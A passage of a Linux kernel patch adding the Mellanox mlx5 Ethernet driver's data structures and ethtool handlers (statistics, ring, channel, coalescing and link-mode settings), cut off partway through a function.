rx_unicast_bytes; + u64 tx_unicast_packets; + u64 tx_unicast_bytes; + u64 rx_multicast_packets; + u64 rx_multicast_bytes; + u64 tx_multicast_packets; + u64 tx_multicast_bytes; + u64 rx_broadcast_packets; + u64 rx_broadcast_bytes; + u64 tx_broadcast_packets; + u64 tx_broadcast_bytes; + + /* SW counters */ + u64 tso_packets; + u64 tso_bytes; + u64 lro_packets; + u64 lro_bytes; + u64 rx_csum_good; + u64 rx_csum_none; + u64 tx_csum_offload; + u64 tx_queue_stopped; + u64 tx_queue_wake; + u64 tx_queue_dropped; + u64 rx_wqe_err; + +#define NUM_VPORT_COUNTERS 31 +}; + +static const char rq_stats_strings[][ETH_GSTRING_LEN] = { + "packets", + "csum_none", + "lro_packets", + "lro_bytes", + "wqe_err" +}; + +struct mlx5e_rq_stats { + u64 packets; + u64 csum_none; + u64 lro_packets; + u64 lro_bytes; + u64 wqe_err; +#define NUM_RQ_STATS 5 +}; + +static const char sq_stats_strings[][ETH_GSTRING_LEN] = { + "packets", + "tso_packets", + "tso_bytes", + "csum_offload_none", + "stopped", + "wake", + "dropped", + "nop" +}; + +struct mlx5e_sq_stats { + u64 packets; + u64 tso_packets; + u64 tso_bytes; + u64 csum_offload_none; + u64 stopped; + u64 wake; + u64 dropped; + u64 nop; +#define NUM_SQ_STATS 8 +}; + +struct mlx5e_stats { + struct mlx5e_vport_stats vport; +}; + +struct mlx5e_params { + u8 log_sq_size; + u8 log_rq_size; + u16 num_channels; + u8 default_vlan_prio; + u8 num_tc; + u16 rx_cq_moderation_usec; + u16 rx_cq_moderation_pkts; + u16 tx_cq_moderation_usec; + u16 tx_cq_moderation_pkts; + u16 min_rx_wqes; + u16 rx_hash_log_tbl_sz; + bool lro_en; + u32 lro_wqe_sz; +}; + +enum { + MLX5E_RQ_STATE_POST_WQES_ENABLE, +}; + +enum cq_flags { + MLX5E_CQ_HAS_CQES = 1, +}; + +struct mlx5e_cq { + /* data path - accessed per cqe */ + struct mlx5_cqwq wq; + void *sqrq; + unsigned long flags; + + /* data path - accessed per napi poll */ + struct napi_struct *napi; + struct mlx5_core_cq mcq; + struct mlx5e_channel *channel; + + /* control */ + struct mlx5_wq_ctrl wq_ctrl; +} ____cacheline_aligned_in_smp; + +struct mlx5e_rq { + /* data path */ + struct mlx5_wq_ll wq; + u32 wqe_sz; + struct sk_buff **skb; + + struct device *pdev; + struct net_device *netdev; + struct mlx5e_rq_stats stats; + struct mlx5e_cq cq; + + unsigned long state; + int ix; + + /* control */ + struct mlx5_wq_ctrl wq_ctrl; + u32 rqn; + struct mlx5e_channel *channel; +} ____cacheline_aligned_in_smp; + +struct mlx5e_tx_skb_cb { + u32 num_bytes; + u8 num_wqebbs; + u8 num_dma; +}; + +#define MLX5E_TX_SKB_CB(__skb) ((struct mlx5e_tx_skb_cb *)__skb->cb) + +struct mlx5e_sq_dma { + dma_addr_t addr; + u32 size; +}; + +enum { + MLX5E_SQ_STATE_WAKE_TXQ_ENABLE, +}; + +struct mlx5e_sq { + /* data path */ + + /* dirtied @completion */ + u16 cc; + u32 dma_fifo_cc; + + /* dirtied @xmit */ + u16 pc ____cacheline_aligned_in_smp; + u32 dma_fifo_pc; + u32 bf_offset; + struct mlx5e_sq_stats stats; + + struct mlx5e_cq cq; + + /* pointers to per packet info: write@xmit, read@completion */ + struct sk_buff **skb; + struct mlx5e_sq_dma *dma_fifo; + + /* read only */ + struct mlx5_wq_cyc wq; + u32 dma_fifo_mask; + void __iomem *uar_map; + struct netdev_queue *txq; + u32 sqn; + u32 bf_buf_size; + struct device *pdev; + __be32 mkey_be; + unsigned long state; + + /* control path */ + struct mlx5_wq_ctrl wq_ctrl; + struct mlx5_uar uar; + struct mlx5e_channel *channel; + int tc; +} ____cacheline_aligned_in_smp; + +static inline bool mlx5e_sq_has_room_for(struct mlx5e_sq *sq, u16 n) +{ + return (((sq->wq.sz_m1 & (sq->cc - sq->pc)) >= n) || + (sq->cc == sq->pc)); +} + +enum channel_flags { + MLX5E_CHANNEL_NAPI_SCHED = 1, +}; + +struct mlx5e_channel { + /* data path */ + struct mlx5e_rq rq; + struct mlx5e_sq sq[MLX5E_MAX_NUM_TC]; + struct napi_struct napi; + struct device *pdev; + struct net_device *netdev; + __be32 mkey_be; + u8 num_tc; + unsigned long flags; + + /* control */ + struct mlx5e_priv *priv; + int ix; + int cpu; +}; + +enum mlx5e_traffic_types { + MLX5E_TT_IPV4_TCP = 0, + MLX5E_TT_IPV6_TCP = 1, + MLX5E_TT_IPV4_UDP = 2, + MLX5E_TT_IPV6_UDP = 3, + MLX5E_TT_IPV4 = 4, + MLX5E_TT_IPV6 = 5, + MLX5E_TT_ANY = 6, + MLX5E_NUM_TT = 7, +}; + +enum { + MLX5E_RQT_SPREADING = 0, + MLX5E_RQT_DEFAULT_RQ = 1, + MLX5E_NUM_RQT = 2, +}; + +struct mlx5e_eth_addr_info { + u8 addr[ETH_ALEN + 2]; + u32 tt_vec; + u32 ft_ix[MLX5E_NUM_TT]; /* flow table index per traffic type */ +}; + +#define MLX5E_ETH_ADDR_HASH_SIZE (1 << BITS_PER_BYTE) + +struct mlx5e_eth_addr_db { + struct hlist_head netdev_uc[MLX5E_ETH_ADDR_HASH_SIZE]; + struct hlist_head netdev_mc[MLX5E_ETH_ADDR_HASH_SIZE]; + struct mlx5e_eth_addr_info broadcast; + struct mlx5e_eth_addr_info allmulti; + struct mlx5e_eth_addr_info promisc; + bool broadcast_enabled; + bool allmulti_enabled; + bool promisc_enabled; +}; + +enum { + MLX5E_STATE_ASYNC_EVENTS_ENABLE, + MLX5E_STATE_OPENED, +}; + +struct mlx5e_vlan_db { + unsigned long active_vlans[BITS_TO_LONGS(VLAN_N_VID)]; + u32 active_vlans_ft_ix[VLAN_N_VID]; + u32 untagged_rule_ft_ix; + u32 any_vlan_rule_ft_ix; + bool filter_disabled; +}; + +struct mlx5e_flow_table { + void *vlan; + void *main; +}; + +struct mlx5e_priv { + /* priv data path fields - start */ + int order_base_2_num_channels; + int queue_mapping_channel_mask; + int num_tc; + int default_vlan_prio; + /* priv data path fields - end */ + + unsigned long state; + struct mutex state_lock; /* Protects Interface state */ + struct mlx5_uar cq_uar; + u32 pdn; + struct mlx5_core_mr mr; + + struct mlx5e_channel **channel; + u32 tisn[MLX5E_MAX_NUM_TC]; + u32 rqtn; + u32 tirn[MLX5E_NUM_TT]; + + struct mlx5e_flow_table ft; + struct mlx5e_eth_addr_db eth_addr; + struct mlx5e_vlan_db vlan; + + struct mlx5e_params params; + spinlock_t async_events_spinlock; /* sync hw events */ + struct work_struct update_carrier_work; + struct work_struct set_rx_mode_work; + struct delayed_work update_stats_work; + + struct mlx5_core_dev *mdev; + struct net_device *netdev; + struct mlx5e_stats stats; +}; + +#define MLX5E_NET_IP_ALIGN 2 + +struct mlx5e_tx_wqe { + struct mlx5_wqe_ctrl_seg ctrl; + struct mlx5_wqe_eth_seg eth; +}; + +struct mlx5e_rx_wqe { + struct mlx5_wqe_srq_next_seg next; + struct mlx5_wqe_data_seg data; +}; + +enum mlx5e_link_mode { + MLX5E_1000BASE_CX_SGMII = 0, + MLX5E_1000BASE_KX = 1, + MLX5E_10GBASE_CX4 = 2, + MLX5E_10GBASE_KX4 = 3, + MLX5E_10GBASE_KR = 4, + MLX5E_20GBASE_KR2 = 5, + MLX5E_40GBASE_CR4 = 6, + MLX5E_40GBASE_KR4 = 7, + MLX5E_56GBASE_R4 = 8, + MLX5E_10GBASE_CR = 12, + MLX5E_10GBASE_SR = 13, + MLX5E_10GBASE_ER = 14, + MLX5E_40GBASE_SR4 = 15, + MLX5E_40GBASE_LR4 = 16, + MLX5E_100GBASE_CR4 = 20, + MLX5E_100GBASE_SR4 = 21, + MLX5E_100GBASE_KR4 = 22, + MLX5E_100GBASE_LR4 = 23, + MLX5E_100BASE_TX = 24, + MLX5E_100BASE_T = 25, + MLX5E_10GBASE_T = 26, + MLX5E_25GBASE_CR = 27, + MLX5E_25GBASE_KR = 28, + MLX5E_25GBASE_SR = 29, + MLX5E_50GBASE_CR2 = 30, + MLX5E_50GBASE_KR2 = 31, + MLX5E_LINK_MODES_NUMBER, +}; + +#define MLX5E_PROT_MASK(link_mode) (1 << link_mode) + +u16 mlx5e_select_queue(struct net_device *dev, struct sk_buff *skb, + void *accel_priv, select_queue_fallback_t fallback); +netdev_tx_t mlx5e_xmit(struct sk_buff *skb, struct net_device *dev); +netdev_tx_t mlx5e_xmit_multi_tc(struct sk_buff *skb, struct net_device *dev); + +void mlx5e_completion_event(struct mlx5_core_cq *mcq); +void mlx5e_cq_error_event(struct mlx5_core_cq *mcq, enum mlx5_event event); +int mlx5e_napi_poll(struct napi_struct *napi, int budget); +bool mlx5e_poll_tx_cq(struct mlx5e_cq *cq); +bool mlx5e_poll_rx_cq(struct mlx5e_cq *cq, int budget); +bool mlx5e_post_rx_wqes(struct mlx5e_rq *rq); +struct mlx5_cqe64 *mlx5e_get_cqe(struct mlx5e_cq *cq); + +void mlx5e_update_stats(struct mlx5e_priv *priv); + +int mlx5e_open_flow_table(struct mlx5e_priv *priv); +void mlx5e_close_flow_table(struct mlx5e_priv *priv); +void mlx5e_init_eth_addr(struct mlx5e_priv *priv); +void mlx5e_set_rx_mode_core(struct mlx5e_priv *priv); +void mlx5e_set_rx_mode_work(struct work_struct *work); + +int mlx5e_vlan_rx_add_vid(struct net_device *dev, __always_unused __be16 proto, + u16 vid); +int mlx5e_vlan_rx_kill_vid(struct net_device *dev, __always_unused __be16 proto, + u16 vid); +void mlx5e_enable_vlan_filter(struct mlx5e_priv *priv); +void mlx5e_disable_vlan_filter(struct mlx5e_priv *priv); +int mlx5e_add_all_vlan_rules(struct mlx5e_priv *priv); +void mlx5e_del_all_vlan_rules(struct mlx5e_priv *priv); + +int mlx5e_open_locked(struct net_device *netdev); +int mlx5e_close_locked(struct net_device *netdev); +int mlx5e_update_priv_params(struct mlx5e_priv *priv, + struct mlx5e_params *new_params); + +static inline void mlx5e_tx_notify_hw(struct mlx5e_sq *sq, + struct mlx5e_tx_wqe *wqe) +{ + /* ensure wqe is visible to device before updating doorbell record */ + dma_wmb(); + + *sq->wq.db = cpu_to_be32(sq->pc); + + /* ensure doorbell record is visible to device before ringing the + * doorbell + */ + wmb(); + + mlx5_write64((__be32 *)&wqe->ctrl, + sq->uar_map + MLX5_BF_OFFSET + sq->bf_offset, + NULL); + + sq->bf_offset ^= sq->bf_buf_size; +} + +static inline void mlx5e_cq_arm(struct mlx5e_cq *cq) +{ + struct mlx5_core_cq *mcq; + + mcq = &cq->mcq; + mlx5_cq_arm(mcq, MLX5_CQ_DB_REQ_NOT, mcq->uar->map, NULL, cq->wq.cc); +} + +extern const struct ethtool_ops mlx5e_ethtool_ops; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c new file mode 100644 index 000000000000..de7aec8abca1 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c @@ -0,0 +1,679 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include "en.h" + +static void mlx5e_get_drvinfo(struct net_device *dev, + struct ethtool_drvinfo *drvinfo) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + struct mlx5_core_dev *mdev = priv->mdev; + + strlcpy(drvinfo->driver, DRIVER_NAME, sizeof(drvinfo->driver)); + strlcpy(drvinfo->version, DRIVER_VERSION " (" DRIVER_RELDATE ")", + sizeof(drvinfo->version)); + snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version), + "%d.%d.%d", + fw_rev_maj(mdev), fw_rev_min(mdev), fw_rev_sub(mdev)); + strlcpy(drvinfo->bus_info, pci_name(mdev->pdev), + sizeof(drvinfo->bus_info)); +} + +static const struct { + u32 supported; + u32 advertised; + u32 speed; +} ptys2ethtool_table[MLX5E_LINK_MODES_NUMBER] = { + [MLX5E_1000BASE_CX_SGMII] = { + .supported = SUPPORTED_1000baseKX_Full, + .advertised = ADVERTISED_1000baseKX_Full, + .speed = 1000, + }, + [MLX5E_1000BASE_KX] = { + .supported = SUPPORTED_1000baseKX_Full, + .advertised = ADVERTISED_1000baseKX_Full, + .speed = 1000, + }, + [MLX5E_10GBASE_CX4] = { + .supported = SUPPORTED_10000baseKX4_Full, + .advertised = ADVERTISED_10000baseKX4_Full, + .speed = 10000, + }, + [MLX5E_10GBASE_KX4] = { + .supported = SUPPORTED_10000baseKX4_Full, + .advertised = ADVERTISED_10000baseKX4_Full, + .speed = 10000, + }, + [MLX5E_10GBASE_KR] = { + .supported = SUPPORTED_10000baseKR_Full, + .advertised = ADVERTISED_10000baseKR_Full, + .speed = 10000, + }, + [MLX5E_20GBASE_KR2] = { + .supported = SUPPORTED_20000baseKR2_Full, + .advertised = ADVERTISED_20000baseKR2_Full, + .speed = 20000, + }, + [MLX5E_40GBASE_CR4] = { + .supported = SUPPORTED_40000baseCR4_Full, + .advertised = ADVERTISED_40000baseCR4_Full, + .speed = 40000, + }, + [MLX5E_40GBASE_KR4] = { + .supported = SUPPORTED_40000baseKR4_Full, + .advertised = ADVERTISED_40000baseKR4_Full, + .speed = 40000, + }, + [MLX5E_56GBASE_R4] = { + .supported = SUPPORTED_56000baseKR4_Full, + .advertised = ADVERTISED_56000baseKR4_Full, + .speed = 56000, + }, + [MLX5E_10GBASE_CR] = { + .supported = SUPPORTED_10000baseKR_Full, + .advertised = ADVERTISED_10000baseKR_Full, + .speed = 10000, + }, + [MLX5E_10GBASE_SR] = { + .supported = SUPPORTED_10000baseKR_Full, + .advertised = ADVERTISED_10000baseKR_Full, + .speed = 10000, + }, + [MLX5E_10GBASE_ER] = { + .supported = SUPPORTED_10000baseKR_Full, + .advertised = ADVERTISED_10000baseKR_Full, + .speed = 10000, + }, + [MLX5E_40GBASE_SR4] = { + .supported = SUPPORTED_40000baseSR4_Full, + .advertised = ADVERTISED_40000baseSR4_Full, + .speed = 40000, + }, + [MLX5E_40GBASE_LR4] = { + .supported = SUPPORTED_40000baseLR4_Full, + .advertised = ADVERTISED_40000baseLR4_Full, + .speed = 40000, + }, + [MLX5E_100GBASE_CR4] = { + .speed = 100000, + }, + [MLX5E_100GBASE_SR4] = { + .speed = 100000, + }, + [MLX5E_100GBASE_KR4] = { + .speed = 100000, + }, + [MLX5E_100GBASE_LR4] = { + .speed = 100000, + }, + [MLX5E_100BASE_TX] = { + .speed = 100, + }, + [MLX5E_100BASE_T] = { + .supported = SUPPORTED_100baseT_Full, + .advertised = ADVERTISED_100baseT_Full, + .speed = 100, + }, + [MLX5E_10GBASE_T] = { + .supported = SUPPORTED_10000baseT_Full, + .advertised = ADVERTISED_10000baseT_Full, + .speed = 1000, + }, + [MLX5E_25GBASE_CR] = { + .speed = 25000, + }, + [MLX5E_25GBASE_KR] = { + .speed = 25000, + }, + [MLX5E_25GBASE_SR] = { + .speed = 25000, + }, + [MLX5E_50GBASE_CR2] = { + .speed = 50000, + }, + [MLX5E_50GBASE_KR2] = { + .speed = 50000, + }, +}; + +static int mlx5e_get_sset_count(struct net_device *dev, int sset) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + + switch (sset) { + case ETH_SS_STATS: + return NUM_VPORT_COUNTERS + + priv->params.num_channels * NUM_RQ_STATS + + priv->params.num_channels * priv->num_tc * + NUM_SQ_STATS; + /* fallthrough */ + default: + return -EOPNOTSUPP; + } +} + +static void mlx5e_get_strings(struct net_device *dev, + uint32_t stringset, uint8_t *data) +{ + int i, j, tc, idx = 0; + struct mlx5e_priv *priv = netdev_priv(dev); + + switch (stringset) { + case ETH_SS_PRIV_FLAGS: + break; + + case ETH_SS_TEST: + break; + + case ETH_SS_STATS: + /* VPORT counters */ + for (i = 0; i < NUM_VPORT_COUNTERS; i++) + strcpy(data + (idx++) * ETH_GSTRING_LEN, + vport_strings[i]); + + /* per channel counters */ + for (i = 0; i < priv->params.num_channels; i++) + for (j = 0; j < NUM_RQ_STATS; j++) + sprintf(data + (idx++) * ETH_GSTRING_LEN, + "rx%d_%s", i, rq_stats_strings[j]); + + for (i = 0; i < priv->params.num_channels; i++) + for (tc = 0; tc < priv->num_tc; tc++) + for (j = 0; j < NUM_SQ_STATS; j++) + sprintf(data + + (idx++) * ETH_GSTRING_LEN, + "tx%d_%d_%s", i, tc, + sq_stats_strings[j]); + break; + } +} + +static void mlx5e_get_ethtool_stats(struct net_device *dev, + struct ethtool_stats *stats, u64 *data) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int i, j, tc, idx = 0; + + if (!data) + return; + + mutex_lock(&priv->state_lock); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_update_stats(priv); + mutex_unlock(&priv->state_lock); + + for (i = 0; i < NUM_VPORT_COUNTERS; i++) + data[idx++] = ((u64 *)&priv->stats.vport)[i]; + + /* per channel counters */ + for (i = 0; i < priv->params.num_channels; i++) + for (j = 0; j < NUM_RQ_STATS; j++) + data[idx++] = !test_bit(MLX5E_STATE_OPENED, + &priv->state) ? 0 : + ((u64 *)&priv->channel[i]->rq.stats)[j]; + + for (i = 0; i < priv->params.num_channels; i++) + for (tc = 0; tc < priv->num_tc; tc++) + for (j = 0; j < NUM_SQ_STATS; j++) + data[idx++] = !test_bit(MLX5E_STATE_OPENED, + &priv->state) ? 0 : + ((u64 *)&priv->channel[i]->sq[tc].stats)[j]; +} + +static void mlx5e_get_ringparam(struct net_device *dev, + struct ethtool_ringparam *param) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + + param->rx_max_pending = 1 << MLX5E_PARAMS_MAXIMUM_LOG_RQ_SIZE; + param->tx_max_pending = 1 << MLX5E_PARAMS_MAXIMUM_LOG_SQ_SIZE; + param->rx_pending = 1 << priv->params.log_rq_size; + param->tx_pending = 1 << priv->params.log_sq_size; +} + +static int mlx5e_set_ringparam(struct net_device *dev, + struct ethtool_ringparam *param) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + struct mlx5e_params new_params; + u16 min_rx_wqes; + u8 log_rq_size; + u8 log_sq_size; + int err = 0; + + if (param->rx_jumbo_pending) { + netdev_info(dev, "%s: rx_jumbo_pending not supported\n", + __func__); + return -EINVAL; + } + if (param->rx_mini_pending) { + netdev_info(dev, "%s: rx_mini_pending not supported\n", + __func__); + return -EINVAL; + } + if (param->rx_pending < (1 << MLX5E_PARAMS_MINIMUM_LOG_RQ_SIZE)) { + netdev_info(dev, "%s: rx_pending (%d) < min (%d)\n", + __func__, param->rx_pending, + 1 << MLX5E_PARAMS_MINIMUM_LOG_RQ_SIZE); + return -EINVAL; + } + if (param->rx_pending > (1 << MLX5E_PARAMS_MAXIMUM_LOG_RQ_SIZE)) { + netdev_info(dev, "%s: rx_pending (%d) > max (%d)\n", + __func__, param->rx_pending, + 1 << MLX5E_PARAMS_MAXIMUM_LOG_RQ_SIZE); + return -EINVAL; + } + if (param->tx_pending < (1 << MLX5E_PARAMS_MINIMUM_LOG_SQ_SIZE)) { + netdev_info(dev, "%s: tx_pending (%d) < min (%d)\n", + __func__, param->tx_pending, + 1 << MLX5E_PARAMS_MINIMUM_LOG_SQ_SIZE); + return -EINVAL; + } + if (param->tx_pending > (1 << MLX5E_PARAMS_MAXIMUM_LOG_SQ_SIZE)) { + netdev_info(dev, "%s: tx_pending (%d) > max (%d)\n", + __func__, param->tx_pending, + 1 << MLX5E_PARAMS_MAXIMUM_LOG_SQ_SIZE); + return -EINVAL; + } + + log_rq_size = order_base_2(param->rx_pending); + log_sq_size = order_base_2(param->tx_pending); + min_rx_wqes = min_t(u16, param->rx_pending - 1, + MLX5E_PARAMS_DEFAULT_MIN_RX_WQES); + + if (log_rq_size == priv->params.log_rq_size && + log_sq_size == priv->params.log_sq_size && + min_rx_wqes == priv->params.min_rx_wqes) + return 0; + + mutex_lock(&priv->state_lock); + new_params = priv->params; + new_params.log_rq_size = log_rq_size; + new_params.log_sq_size = log_sq_size; + new_params.min_rx_wqes = min_rx_wqes; + err = mlx5e_update_priv_params(priv, &new_params); + mutex_unlock(&priv->state_lock); + + return err; +} + +static void mlx5e_get_channels(struct net_device *dev, + struct ethtool_channels *ch) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int ncv = priv->mdev->priv.eq_table.num_comp_vectors; + + ch->max_combined = ncv; + ch->combined_count = priv->params.num_channels; +} + +static int mlx5e_set_channels(struct net_device *dev, + struct ethtool_channels *ch) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int ncv = priv->mdev->priv.eq_table.num_comp_vectors; + unsigned int count = ch->combined_count; + struct mlx5e_params new_params; + int err = 0; + + if (!count) { + netdev_info(dev, "%s: combined_count=0 not supported\n", + __func__); + return -EINVAL; + } + if (ch->rx_count || ch->tx_count) { + netdev_info(dev, "%s: separate rx/tx count not supported\n", + __func__); + return -EINVAL; + } + if (count > ncv) { + netdev_info(dev, "%s: count (%d) > max (%d)\n", + __func__, count, ncv); + return -EINVAL; + } + + if (priv->params.num_channels == count) + return 0; + + mutex_lock(&priv->state_lock); + new_params = priv->params; + new_params.num_channels = count; + err = mlx5e_update_priv_params(priv, &new_params); + mutex_unlock(&priv->state_lock); + + return err; +} + +static int mlx5e_get_coalesce(struct net_device *netdev, + struct ethtool_coalesce *coal) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + + coal->rx_coalesce_usecs = priv->params.rx_cq_moderation_usec; + coal->rx_max_coalesced_frames = priv->params.rx_cq_moderation_pkts; + coal->tx_coalesce_usecs = priv->params.tx_cq_moderation_usec; + coal->tx_max_coalesced_frames = priv->params.tx_cq_moderation_pkts; + + return 0; +} + +static int mlx5e_set_coalesce(struct net_device *netdev, + struct ethtool_coalesce *coal) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + struct mlx5e_channel *c; + int tc; + int i; + + priv->params.tx_cq_moderation_usec = coal->tx_coalesce_usecs; + priv->params.tx_cq_moderation_pkts = coal->tx_max_coalesced_frames; + priv->params.rx_cq_moderation_usec = coal->rx_coalesce_usecs; + priv->params.rx_cq_moderation_pkts = coal->rx_max_coalesced_frames; + + for (i = 0; i < priv->params.num_channels; ++i) { + c = priv->channel[i]; + + for (tc = 0; tc < c->num_tc; tc++) { + mlx5_core_modify_cq_moderation(mdev, + &c->sq[tc].cq.mcq, + coal->tx_coalesce_usecs, + coal->tx_max_coalesced_frames); + } + + mlx5_core_modify_cq_moderation(mdev, &c->rq.cq.mcq, + coal->rx_coalesce_usecs, + coal->rx_max_coalesced_frames); + } + + return 0; +} + +static u32 ptys2ethtool_supported_link(u32 eth_proto_cap) +{ + int i; + u32 supported_modes = 0; + + for (i = 0; i < MLX5E_LINK_MODES_NUMBER; ++i) { + if (eth_proto_cap & MLX5E_PROT_MASK(i)) + supported_modes |= ptys2ethtool_table[i].supported; + } + return supported_modes; +} + +static u32 ptys2ethtool_adver_link(u32 eth_proto_cap) +{ + int i; + u32 advertising_modes = 0; + + for (i = 0; i < MLX5E_LINK_MODES_NUMBER; ++i) { + if (eth_proto_cap & MLX5E_PROT_MASK(i)) + advertising_modes |= ptys2ethtool_table[i].advertised; + } + return advertising_modes; +} + +static u32 ptys2ethtool_supported_port(u32 eth_proto_cap) +{ + if (eth_proto_cap & (MLX5E_PROT_MASK(MLX5E_10GBASE_CR) + | MLX5E_PROT_MASK(MLX5E_10GBASE_SR) + | MLX5E_PROT_MASK(MLX5E_40GBASE_CR4) + | MLX5E_PROT_MASK(MLX5E_40GBASE_SR4) + | MLX5E_PROT_MASK(MLX5E_100GBASE_SR4) + | MLX5E_PROT_MASK(MLX5E_1000BASE_CX_SGMII))) { + return SUPPORTED_FIBRE; + } + + if (eth_proto_cap & (MLX5E_PROT_MASK(MLX5E_100GBASE_KR4) + | MLX5E_PROT_MASK(MLX5E_40GBASE_KR4) + | MLX5E_PROT_MASK(MLX5E_10GBASE_KR) + | MLX5E_PROT_MASK(MLX5E_10GBASE_KX4) + | MLX5E_PROT_MASK(MLX5E_1000BASE_KX))) { + return SUPPORTED_Backplane; + } + return 0; +} + +static void get_speed_duplex(struct net_device *netdev, + u32 eth_proto_oper, + struct ethtool_cmd *cmd) +{ + int i; + u32 speed = SPEED_UNKNOWN; + u8 duplex = DUPLEX_UNKNOWN; + + if (!netif_carrier_ok(netdev)) + goto out; + + for (i = 0; i < MLX5E_LINK_MODES_NUMBER; ++i) { + if (eth_proto_oper & MLX5E_PROT_MASK(i)) { + speed = ptys2ethtool_table[i].speed; + duplex = DUPLEX_FULL; + break; + } + } +out: + ethtool_cmd_speed_set(cmd, speed); + cmd->duplex = duplex; +} + +static void get_supported(u32 eth_proto_cap, u32 *supported) +{ + *supported |= ptys2ethtool_supported_port(eth_proto_cap); + *supported |= ptys2ethtool_supported_link(eth_proto_cap); + *supported |= SUPPORTED_Pause | SUPPORTED_Asym_Pause; +} + +static void get_advertising(u32 eth_proto_cap, u8 tx_pause, + u8 rx_pause, u32 *advertising) +{ + *advertising |= ptys2ethtool_adver_link(eth_proto_cap); + *advertising |= tx_pause ? ADVERTISED_Pause : 0; + *advertising |= (tx_pause ^ rx_pause) ? ADVERTISED_Asym_Pause : 0; +} + +static u8 get_connector_port(u32 eth_proto) +{ + if (eth_proto & (MLX5E_PROT_MASK(MLX5E_10GBASE_SR) + | MLX5E_PROT_MASK(MLX5E_40GBASE_SR4) + | MLX5E_PROT_MASK(MLX5E_100GBASE_SR4) + | MLX5E_PROT_MASK(MLX5E_1000BASE_CX_SGMII))) { + return PORT_FIBRE; + } + + if (eth_proto & (MLX5E_PROT_MASK(MLX5E_40GBASE_CR4) + | MLX5E_PROT_MASK(MLX5E_10GBASE_CR) + | MLX5E_PROT_MASK(MLX5E_100GBASE_CR4))) { + return PORT_DA; + } + + if (eth_proto & (MLX5E_PROT_MASK(MLX5E_10GBASE_KX4) + | MLX5E_PROT_MASK(MLX5E_10GBASE_KR) + | MLX5E_PROT_MASK(MLX5E_40GBASE_KR4) + | MLX5E_PROT_MASK(MLX5E_100GBASE_KR4))) { + return PORT_NONE; + } + + return PORT_OTHER; +} + +static void get_lp_advertising(u32 eth_proto_lp, u32 *lp_advertising) +{ + *lp_advertising = ptys2ethtool_adver_link(eth_proto_lp); +} + +static int mlx5e_get_settings(struct net_device *netdev, + struct ethtool_cmd *cmd) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + u32 eth_proto_cap; + u32 eth_proto_admin; + u32 eth_proto_lp; + u32 eth_proto_oper; + int err; + + err = mlx5_query_port_ptys(mdev, out, sizeof(out), MLX5_PTYS_EN); + + if (err) { + netdev_err(netdev, "%s: query port ptys failed: %d\n", + __func__, err); + goto err_query_ptys; + } + + eth_proto_cap = MLX5_GET(ptys_reg, out, eth_proto_capability); + eth_proto_admin = MLX5_GET(ptys_reg, out, eth_proto_admin); + eth_proto_oper = MLX5_GET(ptys_reg, out, eth_proto_oper); + eth_proto_lp = MLX5_GET(ptys_reg, out, eth_proto_lp_advertise); + + cmd->supported = 0; + cmd->advertising = 0; + + get_supported(eth_proto_cap, &cmd->supported); + get_advertising(eth_proto_admin, 0, 0, &cmd->advertising); + get_speed_duplex(netdev, eth_proto_oper, cmd); + + eth_proto_oper = eth_proto_oper ? eth_proto_oper : eth_proto_cap; + + cmd->port = get_connector_port(eth_proto_oper); + get_lp_advertising(eth_proto_lp, &cmd->lp_advertising); + + cmd->transceiver = XCVR_INTERNAL; + +err_query_ptys: + return err; +} + +static u32 mlx5e_ethtool2ptys_adver_link(u32 link_modes) +{ + u32 i, ptys_modes = 0; + + for (i = 0; i < MLX5E_LINK_MODES_NUMBER; ++i) { + if (ptys2ethtool_table[i].advertised & link_modes) + ptys_modes |= MLX5E_PROT_MASK(i); + } + + return ptys_modes; +} + +static u32 mlx5e_ethtool2ptys_speed_link(u32 speed) +{ + u32 i, speed_links = 0; + + for (i = 0; i < MLX5E_LINK_MODES_NUMBER; ++i) { + if (ptys2ethtool_table[i].speed == speed) + speed_links |= MLX5E_PROT_MASK(i); + } + + return speed_links; +} + +static int mlx5e_set_settings(struct net_device *netdev, + struct ethtool_cmd *cmd) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + u32 link_modes; + u32 speed; + u32 eth_proto_cap, eth_proto_admin; + u8 port_status; + int err; + + speed = ethtool_cmd_speed(cmd); + + link_modes = cmd->autoneg == AUTONEG_ENABLE ? + 